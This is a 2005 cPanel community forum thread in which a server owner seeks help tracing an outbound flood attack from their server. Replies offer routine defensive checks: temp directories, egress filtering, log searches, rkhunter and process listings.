The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Outbound attack please help

Discussion in 'General Discussion' started by shann, Nov 3, 2005.

  1. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi,

    Someone is doing outbound attack from our server and got complained from DC, but they haven't provide thei nfo. They provided the IP address which was hit from our server.

    What file I need to check it ?

    Anyone can help me?

    thanks
    shan
     
  2. Freezer

    Freezer Well-Known Member

    Joined:
    Jun 13, 2005
    Messages:
    120
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Den Haag
    Scan your /tmp and /var/tmp for strange files belonging to nobody and search the forums on outbound upd attack, taht will show a thread with more helpfull info.
     
  3. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    You need to clean up your server from all the strange files downloaded and/or installed on your server. Kill all the processes used/exahusted by these tools and then you need to patch, upgrade, and secure your server. Good luck!
     
  4. BianchiDude

    BianchiDude Well-Known Member
    PartnerNOC

    Joined:
    Jul 2, 2005
    Messages:
    619
    Likes Received:
    0
    Trophy Points:
    16
    Also check /dev/shm
     
  5. panayot

    panayot Well-Known Member

    Joined:
    Nov 18, 2004
    Messages:
    125
    Likes Received:
    0
    Trophy Points:
    16
  6. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Thank you guys, but I have the targetted IP, is any way I can track it down?.
    Can we check it at /var/log/messages?

    thanks
     
  7. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    I have instatlled APF and How do we stop the outbound attack?. I have teh targetted
    Ip.

    Please help me.

    thanks
     
  8. NightStorm

    NightStorm Well-Known Member

    Joined:
    Jul 28, 2003
    Messages:
    286
    Likes Received:
    4
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
    With APF, set up and enable egress filtering. It will not stop your server from sending the attack, but it will stop the packets from leaving your server.
    Check server logs (httpd logs) for the word wget. This is often used as part of a URL exploit that tells a site on your server to download and install a perl script to launch packet attacks. This will give you an idea of how the attack was started, and which site you need to be checking.
    Look for outdated programs on your server (read: phpBB).
    Run rkhunter.
    Secure your /tmp directory.
    search the /tmp directory for any pl files. If you find them, delete them.
    http://eth0.us is a good place to start.
     
  9. avijit

    avijit Well-Known Member

    Joined:
    Jul 26, 2004
    Messages:
    116
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    Check all the current processes through ps -auxf | more. It can give you and glimse of the attack that is orinating from the server. Probally someone is scanning the other host for a vulnerability.
     
  10. shann

    shann Well-Known Member

    Joined:
    Jul 5, 2002
    Messages:
    366
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Website Owner
    Hi,

    I have used rkhunter and got following message? Is anything need to be fixed?
    Any help would be appreicated.


    Security advisories
    * Check: Groups and Accounts
    Searching for /etc/passwd... [ Found ]
    Checking users with UID '0' (root)... [ OK ]

    * Check: SSH
    Searching for sshd_config...
    Found /etc/ssh/sshd_config
    Checking for allowed root login... Watch out Root login possible. Possible risk!
    info:
    Hint: See logfile for more information about this issue
    Checking for allowed protocols... [ Warning (SSH v1 allowed) ]


    Also, got this

    D5
    MD5 compared: 0
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 3

    Scanning took 466 seconds


    How do we tack it down?
     
  11. dalem

    dalem Well-Known Member
    PartnerNOC

    Joined:
    Oct 24, 2003
    Messages:
    2,577
    Likes Received:
    40
    Trophy Points:
    48
    Location:
    SLC
    cPanel Access Level:
    DataCenter Provider
    your server is most likely is not compromised some sort of udp or tcp floooder was uploaded into your tmp dir though a a insecure php script


    run a ps auxf and look for somthing running that should not be


    my god man if you cant find whats leaving your server hire someone to track it down for you
    we cant see it from the forums :)
     
Loading...
Similar Threads - Outbound attack please
  1. ApparentMedia
    Replies:
    1
    Views:
    425
  2. sahostking
    Replies:
    5
    Views:
    31,410

Share This Page